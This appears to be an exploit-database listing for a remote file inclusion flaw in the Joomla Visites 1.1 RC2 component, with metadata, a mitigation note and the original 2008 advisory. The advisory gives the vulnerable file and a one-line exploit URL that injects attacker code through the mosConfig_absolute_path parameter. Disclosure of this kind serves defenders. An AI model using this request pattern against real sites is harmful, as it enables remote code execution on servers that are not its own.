header-logo
Suggest Exploit
vendor:
Joomla Visites
by:
NoGe
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Joomla Visites
Affected Version From: 1.1 RC2
Affected Version To: 1.1 RC2
Patch Exists: YES
Related CWE: N/A
CPE: a:joomla-visites:joomla-visites:1.1rc2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla Visites 1.1 RC2 Remote File Inclusion Vulnerability

A vulnerability exists in com_joomla-visites version 1.1 RC2, which allows an attacker to include a remote file by sending a specially crafted request to the vulnerable file 'administrator/components/com_joomla-visites/core/include/myMailer.class.php'. The vulnerable code is 'require_once $mosConfig_absolute_path . '/includes/phpmailer/class.phpmailer.php';' which allows an attacker to include a remote file by sending a specially crafted request to the vulnerable file.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.
Source

Exploit-DB raw data:

/===============================================================================================================================================\
  |																		  |
  |  [o] Joomla Visites 1.1 RC2 Remote File Inclusion Vulnerability										  |
  |																		  |
  |       Software : com_joomla-visites version 1.1 RC2												  |
  |       Vendor   : http://www.joomla-visites.net/												  |
  |       Author   : NoGe															  |
  |       Contact  : noge[dot]code[at]gmail[dot]com												  |
  |																		  |
  |===============================================================================================================================================|
  |																		  |
  |  [o] Vulnerable file															  |
  |																		  |
  |       administrator/components/com_joomla-visites/core/include/myMailer.class.php								  |
  |																		  |
  |        require_once $mosConfig_absolute_path . '/includes/phpmailer/class.phpmailer.php';							  |
  |																		  |
  |																		  |
  |																		  |
  |  [o] Exploit																  |
  |																		  |
  |       http://localhost/[path]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode]  |
  |																		  |
  |===============================================================================================================================================|
  |																		  |
  |  [o] Greetz																	  |
  |																		  |
  |       all crew #papuahacker #nyubicrew #baliemhackerlink											  |
  |       skulmatic olibekas ulga Cungkee nyubi k1tk4t LoCK3R culun_borneo											  |
  |       yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ str0ke										  |
  |       http://kapukvalley.net member														  |
  |																		  |
  \===============================================================================================================================================/

# milw0rm.com [2008-04-25]